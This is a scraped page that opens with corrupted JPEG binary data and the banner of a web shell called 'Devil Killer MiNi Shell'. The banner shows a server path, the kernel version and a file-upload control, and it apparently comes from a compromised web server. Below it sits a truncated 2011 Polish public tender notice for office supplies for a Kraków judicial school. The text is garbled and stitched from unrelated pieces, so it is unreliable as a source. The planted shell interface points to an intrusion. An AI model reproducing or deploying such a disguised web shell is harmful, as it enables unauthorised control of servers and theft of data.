JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110209/47737-N-2011.html

<p class="kh_header"><b>Kraków: Sukcesywna dostawa materiałów biurowych dla Krajowej Szkoły Sądownictwa i Prokuratury     w Krakowie , ul. Przy Rondzie 5 oraz w Lublinie, ul. Krakowskie Przedmieście 62 w 2011 r.</b><br>
<b>Numer ogłoszenia: 47737 - 2011; data zamieszczenia: 09.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Krajowa Szkoła Sądownictwa i Prokuratury , ul. Przy Rondzie 5, 31-547 Kraków, woj. małopolskie, tel. 12 617 94 10, faks 12 617 94 11.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa materiałów biurowych dla Krajowej Szkoły Sądownictwa i Prokuratury     w Krakowie , ul. Przy Rondzie 5 oraz w Lublinie, ul. Krakowskie Przedmieście 62 w 2011 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Cześć A - tusze do drukarek

L.p.	          Nazwa  drukarki	   Cena jednostkowa 
            brutto	         Ilość tonerów
          (zestawów)	         Nazwa producenta 
        oraz symbol tonera
1.	Priport Master (RICOH)  HQ 40L 
320 mm x 110 m x 2 rolls		12 opakowań = 24 rolki
	
2.	Priport  Ink (RICOH) HQ  40 L

Część B - tonery

Lp.	                  Nazwa  drukarki/ toner	Cena jednostkowa 
            brutto	Ilość  tonerów 
   (zestawów)	Nazwa producenta oraz
symbol tonera(cartriga)
1	HP Laser Jet 3005/Q7551X 		9	
2	HP Laser Jet 1022/Q2612A		9	
3	HP Laser Jet 2015/Q7553XN		40	
	                              /Q7553AN		70	
4	HP Laser Jet 1320/ Q5949X		17	
5	HP Laser Jet Color 1600/2600/HP6000AN		14	
	                                                 /HP6001AN		13	
	                                                 /HP6002AN		12	
	                                                 /HP6003AN		13	
6	HP Color Laser Jet 4005/CB400A		8	
	                                        /CB401A		6	
	                                        /CB402A		6	
	                                        /CB403A		6	
7	Samsung 2010 P/ML 2010D3		4	
8	Canon  Fax/I-SensSys L100/Toner FX 10 		25	
9	Kyocera KM 2550/TK-420		4	
10	Kyocera FS 1118 MFP/TK-18		20	
11	 Kyocera FS 1020/KTK-18 N 		10	
12	HP Laser Jet 1505/ ICHCB 436AN		20	
13	HP Laser Jet 2035/2055/ ICHCE 505XN		20	
	                                       /ICHCE 505AN/CE459A		65	
14	Canon IRC  2380 i/FC6 9038/C-EXV21		3	
	                               /FC6 9046/niebieski		3	
	                               /FC6 9047/czerwony		3	
	                               /FC6 9048/żólty		3	
15	 EPSON/ERC-09 B		10	
16	Work Centre 5225/5230/ Bęben Xerox / 101R00435		8	
	                                        /T.Cartr.  106R01305		14	
17	HP do 5200/ HQ 7516A		2	
18	HP Desk  6940/6980/czarny (C4180) IC 0337		2	
	                                  /kolor  (D5160) IC 0343		2	
19	HP OfficeJet 7500A/ CD971AE		12	
	                                 /CD972AE		12	
	                                 /CD973AE		12	
	                                 /CD974AE		12	
20	Oki C530DN/44469803		10	
	                      /44469704		9	
	                       /44469705		9	
	                       /44469706		9	
21	Oki - mc561dn/44469803		9	
	                         /44469704		8	
	                         /44469705		8	
	                         /44469706		8	
22	WorkCenter 5755 DADH/HCF/6R90198  		3	    
	                                                  /6R90199		4	
	                                                  /6R90200		4	
	                                                  /6R90201		4	
1. Zamawiający wymaga, aby oferowane tonery (cartridge) były oryginalne i nieregenerowane.
2. Zamawiający dopuszcza składanie ofert równoważnych (produkt równoważny nie może być produktem regenerowanym, poddanym procesowi ponownego napełniania, wymiany jakichkolwiek elementów). Wykonawca może zaproponować taki produkt, który będzie spełniać wszystkie wymagane parametry, normy i standardy jakościowe, co produkt określony w SIWZ. Zaproponowany przez wykonawcę produkt nie może powodować utraty gwarancji użytkowanego sprzętu.
3. W ofertach równoważnych należy wskazać producenta i symbol oferowanego produktu. 


600 ml x 5 		10 opakowań = 50 sztuk	
1. Zamawiający wymaga, aby oferowane tonery (cartridge) były oryginalne i nieregenerowane.
2. Zamawiający dopuszcza składanie ofert równoważnych (produkt równoważny nie może być produktem regenerowanym, poddanym procesowi ponownego napełniania, wymiany jakichkolwiek elementów). Wykonawca może zaproponować taki produkt, który będzie spełniać wszystkie wymagane parametry, normy i standardy jakościowe, co produkt określony w SIWZ. Zaproponowany przez wykonawcę produkt nie może powodować utraty gwarancji użytkowanego sprzętu.
3. W ofertach równoważnych należy wskazać producenta i symbol oferowanego produktu.

Część C - papier, druki i materiały biurowe

Lp.	Nazwa artykułu  biurowego	Cena jednostkowa brutto	Ilość	Wartość
brutto  ogółem
1.	Polecenie  wyjazdu  służbowego- krajowego, min. 100 kartek		40 bloczków	
2.	Polecenie  wyjazdu służbowego- zagranicznego, min. 100 kartek		20 bloczków	
3.	Karta  Drogowa numerowana,
min. 100 kartek		40 bloczków	
4.	Spis  z  natury samokopiujący,
min. 50 kartek		40 bloczków	
5.	Ewidencja  wyjść  służbowych,
min. 50 kartek		20 bloczków	
SUMA	



Lp.	Nazwa artykułu  	Artykuł proponowany
cena jednostkowa brutto	Ilość	Wartość
brutto ogółem
1.	Papier ksero do drukarek A-3 80g/m2
białość pow. CIE 160		500 ryz	
2.	Papier ksero do drukarek A-4 80g/m2
białość pow. CIE 160		4400 ryz	
3.	Papier ksero do drukarek A-4 120g/m2 biały kredowy białość pow. CIE 150		45 ryz	
4.	Papier ksero do drukarek A-4 220g/m2
biały kredowy białość pow. CIE 150		25 ryz	
5.	Papier ksero do drukarek A-4 260g/m2
biały kredowy białość pow. CIE 150		25 ryz	
SUMA	



Lp.
	                  Nazwa artykułu	  Artykuł proponowany/
   cena jednostkowa brutto	           Ilość	Wartość
        brutto ogółem
1.	Baterie  paluszki:
-AA    (1 op. 4 szt.)
-AAA (1 op. 4 szt.)
-Supreme  AA (1 op. 2 szt.)	
	
25 opak.
25 opak.
3 opak.	
2.	Blok  notatnikowy:
-A4-50 kart.
-A4-100 kart.
-A5-50 kart.
-A5-100 kart.		
100 szt.
100 szt.
100 szt.
100 szt.	
3. 	Cienkopisy (zestaw 4 kolorów)		50 kompl.	
4.	Clipboard  rozkładany czarny		3 szt.	
5.	Chusteczki  higieniczne  w 
pudełkach  pakowane  po 
100 sztuk		5 kartonów	
6.	Datownik  z  hasłami		1 szt.	
7.	Datownik		10 szt.	
8.	Deski  z klipem (różne kolory)		20 szt.	
9.	Druki akcydensowe:
-KP                80 k
-KW               80 k
-Nota księgowa     80 k		
10 bloczków
10 bloczków
10 bloczków	
10.	Dziurkacze:
-25 kartek
-60 kartek		
50 szt.
1 szt.	
11.	Etykiety  samoprzylepne (białe)
o wymiarach: 99,1 x 38,1 mm
(14 szt. na arkusz)		
6 opakowań 
x  100 szt.	
12.	Etykiety  samoprzylepne:
-210 x 297 mm      (100 szt.)
-192 x 38 mm        (100 szt.)
-38,1 x 21,2 mm    (100 szt.)
-64.6 x 33,8 mm    (100 szt.)		
2  opakow.
2  opakow.
2  opakow.
2  opakow.	
13.	Foliopis  z  zakładkami
indeksującymi  (4 kolory)		
40 szt.	
14.	Folia  do  laminowania
Format:  A4 (10 szt. w Opako.)
Grubość 80 Gloss		2 opakowania
 	
15.	Grzbiety  do bindowania A100:
-14 MM     1 op.- 100 szt.
-16 MM     1 op.-100 szt.
-19 MM     1 op.-100 szt.
Grzbiety  do  bindowania A50:
-22 MM     1 op.-50 szt.
Okładki  do  bindowania:
-Karton A100   1op.- 100 szt.
-Folia A100      1 op.-100 szt.		
5 opakowań
5 opakowań
5 opakowań

5 opakowań

2 opakow.
3 opakow.	
16.	Grzbiety  nasuwane:
-3-6 MM
-6-9 MM		
200 szt.
200 szt.	
17.	Grzbiety  wsuwane:
-6MM   do 30 kartek biały( 1 op. - 500 szt.
-6 MM do 60 kartek (czarny) 1 op. 500szt.
-6 MM 1 op. 50 szt.
-10 MM     1 op. -50 szt.		
2 opakow.
2  opakow.
10 opakow.
10 opakow.	
18.	Grzbiety  zaciskowe  do
segregatorów :
-do 30 kartek    1 op. - 50 szt.
-do 60 kartek    1 op. - 50 szt.		

10 szt.
10 szt.	
19.	Gumki  do  mazania
biało-niebieska (dwustronne)		
40 szt.	
20..	Kalkulatory duże		10 szt.	
21.	Karteczki  samoprzylepne:
-76 x 76
-51 x 51
-Bloczki  samoprzylepne  
z  liniami  Super Sticky  Ultra:
-102 x 152 (2x90kartek) 
-100 x 100 (6x90kartek)		
200 szt.
200 szt.


70 op
35 op.	
22.	Klawiatura  numeryczna		1 szt.	
23.	Klipsy  biurowe (różne wielk.)
-15 mm (12 szt. w opakowaniu)
-19 mm (12 szt. w opakowaniu)
-25 mm (12 szt. w opakowaniu)
-32 mm (12 szt. w opakowaniu)
-41 mm (12 szt. w opakowaniu)
-51 mm (12 szt. w opakowaniu)		
20 opakowań
20 opakowań
20 opakowań
20 opakowań
20 opakowań
20 opakowań	
24. 	Koperty:
-C-5 biała  1op.-500 szt.
-C-6 biała  1op.-1000 szt.
-C-4 biała  1op. -250 szt.
-DL-biała  1op. -25 szt.
-SDS- rozszerzany bok - biała  1 op.- 100 szt.
-LDS- biała- rozszerzany  bok 1 op.- 100 szt.	
	10 opakow.
10 opakow.
10 opakow.
20 opakow.

5 opakow.
5opakow.	
25.	Korektory w taśmie		60 szt.	
26.	Korektory  w  piórze		60 szt.	
27.	Korektory  TIPP-EX Rapid 
lub równoważny		60 szt.	
28.	Koszulki  na  płyty  CD/DVD		200 szt.	
29.	Koszulki  zapinane  na  rzepy		200 szt.	
30.	Koszulki  z  klapką		500 szt.	
31.	Koszulka  poszerzana  A4, 1 op.- 10 szt.		100 opakow.	
32.	Koszulka  poszerzana  23 mm, A4		100 opakow.	
33.	Koszulki  krystaliczne  A4, 1 op.- 100 szt.		100 opakow.	
34.	Koszulki  A5  1 op.- 100 szt.		10 opakow.	
35.	Koszulka  super  sztywna  A4		5 opakow.	
36.	Kostki  kubikowe (kolorowe)		20 szt.	
37.	Kleje  biurowe w   sztyfcie		40 szt.	
38.	Karton  wizytówkowy  
5 op. x 20 ark.		
5 szt.	
39.	Książki  korespondencyjne:
-kolor  granatowy (300 kart.)
- kolor granatowy (100 kart.)		
20 szt.
20 szt.	
40.	Kołonotatnik:
-A4 twarda  oprawa-  160 k
-A5-80 kart.
-B5- 160 kart.		
60 szt.
60 szt.
60 szt.	
41.	Linijki:
-długie      50 cm
-krótkie     16 cm		
50 szt.
50 szt.	
42.	Markery  4 kolorowe + gąbka		15 komplet.	
43.	Markery  do  płyt  CD 
Grubość  F 4 kolory: 
-czarny
-czerwony
-niebieski
-zielony		

10 komplet.	
44.	 Zeszyty na spirali 90 kartek B5		
10 szt.	
45.	Mechanizmy  skoroszytowe		100 szt.	
46.	Nawilżacz do  palców		20 szt.	
47.	Niszczarki 
- liczba kartek niszczonych jednorazowo
 8-12, pojemność 10l - 14l		10 szt.	
48.	Nożyczki:
-duże
-małe		
50 szt.
50 szt.	
49.	Nóż  do  kopert /papieru		40 szt.	
50.	Nożyk  do  otwierania  listów		40 szt.	
51.	Notatnik  w  kratkę:
-A4-50 kart.
-A4-100 kart.
-A5-50 kart.
-A5-100 kart.		
100 szt.
100 szt.
100 szt.
100 szt.	
52.	Notatnik  teleadresowy 
A-4  60 k		
12 szt.	
53.	Numerator (6 cyfr)		10 szt.	
54.	Okładki  do  grzbietów  
nasuwanych:
-3-6 mm
-6-9 mm

		

200 szt.
200 szt.	
55.	Ofertówki:
-Format A4
-Ofertówki  sztywne		
1000 szt.
1000 szt.	
56.	Ołówki:
- 2B
-zwykłe  HB z  gumką
-automatyczne
-grafity  do  ołówków  automat.		
60 szt.
60 szt.
60 szt.
60 szt.	
57. 	Długopisy  typu  BIC (4 kolory) 
lub równoważny
-czarny
-czerwony
-niebieski
-zielony		
100 szt.
100 szt.
100 szt.
100 szt.	
58.	Długopisy  typu  PENTEL  BK 77
lub równoważny:
-czarne
-niebieskie
-wkłady  do  długopisów  
PENTEL  BK 77:
-czarne
-niebieskie		
100 szt.
100 szt.


100 szt.
100 szt.	
59.	Długopisy   typu TRIPLUS 431 
STAEDTLER zestaw  20 szt. 
lub równoważny 		 5 opakowań 
x  4 szt.	
60.	Długopisy  zwykłe (4 kolory):
-czarny
-czerwony
-niebieski
-zielony
-wkłady  do  długopisów  
zwykłych		
100 szt.
100 szt.
100 szt.
100 szt.
100 szt.	
61.	Długopisy  żelowe (4 kolory):
-czarne
-czerwone
-niebieskie
-zielone		
100 szt.
100 szt.
100 szt.
100 szt.	
62.	Długopisy  typu  Zenith
lub równoważny
-wkłady  do  długopisów typu Zenith 
lub równoważny		10 szt.
10 szt.	
63.	Długopis  żelowy  z  zakładkami
indeksującymi		60 szt.	
64.	Długopis  typu Pilot VP Hi- Tecpoint
lub równoważny
0,5 (4 kolory):
-czarny
-czerwony
-niebieski
-zielony		

100 szt.
100 szt.
100 szt.
100 szt.	
65.	Podkładki  pod  mysz		10 szt.	
66.	Pisaki  grube (4 kolory)  typu Marker
BIC- końcówka okrągła
lub równoważny
-czarny
-czerwony
-niebieski
-zielony		

100 szt.
100 szt.
100 szt.
100 szt.	
67.	Zestaw  zakreślaczy
(komplet  6 kolorów) zakreślacz
TH  1127		
60 kompl.	
68.	Pinezki  (pudełko  100 szt.)		10 opakowań	
69.	Papier/naklejka  do  oklejania  
bagażu  A-4  12 mm x 12,5 mm
		
4 pudełka	
70.	Pojemnik  na  długopisy		20 szt.	
71.	Pojemnik  kartonowy  na
czasopisma (kolor  niebieski):
-A4-100 mm
-A4-70 mm		

40 szt.
40 szt.	
72.	Podpórka  do  książek  duża   
(z  plexi)		
50 szt.	
73.	Pióro  kulkowe  z  zakładkami
indeksującymi		
30 szt.	
74.	Pióra  kulkowe 0,7:
-czarne
-czerwone
-niebieskie
-zielone		
20 szt.
20 szt.
20 szt.
20 szt.	
75.	Przybornik  biurkowy  typ  Dual  
DL  1001 Dymny lub równoważny		
5 szt.	
76.	Podajnik  z  zakładkami indeksującymi		5 szt.	
77.	Podajnik  do  taśmy  klejącej		1 szt.	
78.	Pojemnik  na  spinacze		2 szt.	
79.	Półka  na  dokumenty		10 szt.	
80.	Podstawka  na  dokumenty		1 szt.	
81.	Płyty:
-Dvd-R
-Cd-Rw
-Cd-R		
100 szt.
100 szt.
100 szt.	
82.	Przekładki  kartonowe 1/3 A4
(różne  kolory)		20 opakowań 
x  100 szt.	
83.	Przekładki  kartonowe A4:
-alfabetyczne    21  stron
-1-12
-1-31
-1-10		
30 opakowań
30 opakowań
30 opakowań
30 opakowań	
84.	Segregatory A4:
-5 cm-(różne  kolory)
-7 cm-(różne  kolory)		
1000 szt.
1000 szt.	
85.	Segregatory  A5:
-5 cm-(różne  kolory)
-7 cm-(różne  kolory)		
500 szt.
500 szt.	
86.	Serwetki  zwykłe (20 sztuk)		10 kartonów	
87.	Sprzężone  powietrze (400 ml)		10 poj.	
88.	Systemy  harmonijkowe:
-13 kieszeni
-25 kieszeni
-32 kieszenie		
2 szt.
2 szt.
2 szt.	
89.	Skoroszyty  zwykłe		500 szt.	
90.	Skoroszyty  z  klipsem		100 szt.	
91.	Skoroszyt  A4 (różne kolory)		500 szt.	
92.	Skoroszyt  A4  zawieszany 
(różne  kolory)
		
500 szt.	
93.	Skoroszyt  wpinany typu  BIURFOL 
 lub równoważny
A4  z  otworami  pozwalającymi  
na  wpięcie  do  segregatora		
500 szt.	
94.	Spinacze  okrągłe:
-duże (50 mm)
-małe (28 mm)		
50 opakowań
50 opakowań	
95.	Stojak  na  koperty  z  3 
 przegródkami		
1 szt.	
96.	Ściereczki  czyszczące  do  
ekranów  w  plastikowym  opakowaniu		
6 opakowań	
97.	Temperówki
		50 szt.	
98.	Teczki  do  podpisu  kolor  
granatowy-z  harmonijką		
20 szt.	
99.	Tusze  do  pieczątek 20 ml (4 kolory):
-czarny
-czerwony
-niebieski
-zielony		
30 szt.
30 szt.
30 szt.
30 szt.	
100.	Teczka  zwykła:
-wiązana kartonowa
-z  gumką		
2000 szt.
1000 szt.	
101.	Rozszywacz		20 szt.	
102.	Zszywacz  mały		20 szt.	
103.	Zszywacz  mini		10 szt.	
104.	Zszywacz  z  wydłużonym 
ramieniem		1 szt.	
105.	Zszywacz  elektryczny		1 szt.	
106.	Zszywki  do  zszywacza  elektrycznego 
 24/6		
10 opakowań	
107.	Zszywki  biurowe:
-24/6 10 opak. po 1000 szt.
-23/17 10 opak. po 1000 szt.
-23/13 10 opak. po 1000 szt.
-23/10 10 opak. po 1000 szt.		
50 pudełek
50 pudełek
50 pudełek
50 pudełek	
108.	Taśma  klejąca  bezbarwna  
pakowa o szerokości  48-50 mm		
20 szt.	
109.	Taśmy:
-biurowa
-dwustronna    50 mm
-klejąca		
40 szt.
40 szt.
40 szt.	
110.	Taśma  klejąca  usuwalna		10 szt.	
111.	Taśma  klejąca z  podajnikiem		40 szt.	
112.	Zakładki  indeksujące typu  IDEST lub równoważne
(wym. 20 x 50 mm)
-Zakładki  indeksujące  
z dyspenserem  typu Post  It lub
 równoważne
- zakładki typu Post  It  Index  lub równoważne 
 proste  i  wygięte		

200 szt.

200 szt.

200 szt.	
113.	Zakreślacz  z  zakładkami  indeksującymi  (4 kolory)		
40 szt.	
114.	Trymer  gilotyna		1 szt.	
115.	Płyn  w  sprayu  do  czyszczenia  ekranów  komputerowych  oraz  ekranów  TV LCD		
5 szt.	
116.	Pianka  do  czyszczenia  tablic  
sucho ścieralnych		
50 szt.	
117.	Szary  papier  do  drukowania 
A4 (oraz  inne  kolory)
1 op. - 500 szt.		
6 opakowań	
118.	Tablice  Flipchart
-Papier  do  tablic  Flipchart:
-Format  100 x 65 mm  70 g 
kratka
-Format   100  65 mm  gładki

		20 szt.


20 arkuszy
40 arkuszy	
119.	Teczki  skrzydłowe  z  rzepem
(kolorowe)		
200 szt.	
120.	Teczki  lakierowane z gumką
(kolorowe)		
200 szt.	
121.	Teczki  kopertowe (kolorowe):
-A3- zatrzaskowe
-A4-zatrzaskowe		
100 szt.
100 szt.	
122.	Teczki  A4  (z  twardej  tektury  
z  uchwytem):
-100 mm grzbiet
-40 mm grzbiet		

10 szt.
10 szt.	
123.	Teczki  przestrzenne  z  gumką		50 szt.	
124.	Teczki z  gumką  typu ELBA lub
 równoważne

-Teczki  z przekładkami o dużej  pojemności  typu Bantex lub równoważne		
100 szt.

500 szt.	
125.	Teczki z  2  narożnymi  (PP)
gumkami (kolorowe)		100 szt.	
126.	Teczka  z  rączkami		100 szt.	
127.	Teczki  tekturowe  sztywne  typu
ELBA  do  zawieszania  z  płóciennymi   bokami lub równoważny:
-czerwone
-niebieskie
-zielone
-żółte		


100 szt.
100 szt.
100 szt.
100 szt.	
128.	Zeszyty  w  twardej  oprawie:
-A4-96 kart.
-A4-192 kart.
-A5-96 kart.
-A5-192 kart.		
60 szt.
60 szt.
60 szt.
60 szt.	
129.	-Skorowidz  alfabetyczny:
-format A4
-format A5		60 szt.
60 szt.	
130..	Bindownica 300 k		1 szt.	
131.	Termobindownica   600 str.		1 szt.	
132..	Listwa przeciwprzepięciowa		5 szt.	
133.	Krzesło  YUNICO  czarne		10 szt.	
133.	Ergonomiczna  podpórka  pod  plecy		30 szt.	
134.	Podłokietnik  standard  2 szt.		30 szt.	
135..	Podnóżek		30 szt.	
136.	Składany  stojak  na  katalogi  A4  wyk. 
z  PCV 100 mm granatowy		
10 szt.	
137.	Składany  stojak  na  katalogi A4  wyk. 
z  PCV  70 mm  czerwony		
10 szt.	
138.	Termookładki:
- grzbiet 3 mm
- grzbiet  6 mm
-grzbiet  9 mm

		
200 szt.
200 szt.
200 szt.	
139.	Woreczki  strunowe:
-4 x 6 cm          1 op.- 100 szt.
-15 x 22 cm      1 op.- 100 szt.
-30 x 40 cm      1 op.- 100 szt.		
5 opakowań
10 opakowań
10 opakowań	
140.	Pudło  archiwizacyjne typu Esselte lub równoważny
Format  A4  na  6  sztuk segregatorów		30 szt.	
141.	Skoroszyt  zawieszany A4  ELBA
personalno-kredytowy  VERTIC 1 - lub równoważny		500 szt.	
142.	Skoroszyt  zawieszany A4  ELBA
Personalno-kredytowy  VERTIC 3 - lub równoważny		500 szt.	
143.	Skoroszyt  zawieszany  do  akt  osobowych:
-kolor  niebieski
-kolor  zielony
		
20 szt.
20 szt.	
144.	Zestaw czyszczący do  drukarki  typu
EVOLIS  A 5011 lub równoważny		
1 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>. Wykonawca ubiegający się o udzielenie zamówienia w szczególności musi wykazać, że:
w zakresie części A
 w okresie ostatnich trzech lat przed upływem terminu składania ofert dostarczał sukcesywnie przez okres co najmniej 6 miesięcy za rzecz co najmniej 1 zamawiającego tonery o wartości co najmniej 25.000 zł brutto; 
Wzakresie cz. B
w okresie ostatnich trzech lat przed upływem terminu składania ofert dostarczał sukcesywnie przez okres co najmniej 6 miesięcy za rzecz co najmniej 1 zamawiającego tonery o wartości co najmniej 35.000 zł brutto
W zakresie cz. C
w okresie ostatnich trzech lat przed upływem terminu składania ofert dostarczał sukcesywnie przez okres co najmniej 6 miesięcy za rzecz co najmniej 1 zamawiającego materiały biurowe o wartości co najmniej 75.000 zł brutto;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie cz. A, B i C
dysponuje środkami transportu oraz odpowiednią liczbą ludzi gwarantującymi terminową i rzetelną realizację przedmiotu zamówienia;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie cz. A
dysponuje środkami transportu oraz odpowiednią liczbą ludzi gwarantującymi terminową i rzetelną realizację przedmiotu zamówienia;
W zakresie cz. B
posiada środki finansowe w kwocie co najmniej 30.000 zł oraz ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej wystawione na kwotę nie mniejszą niż 30.000 zł.
W zakresie cz. C
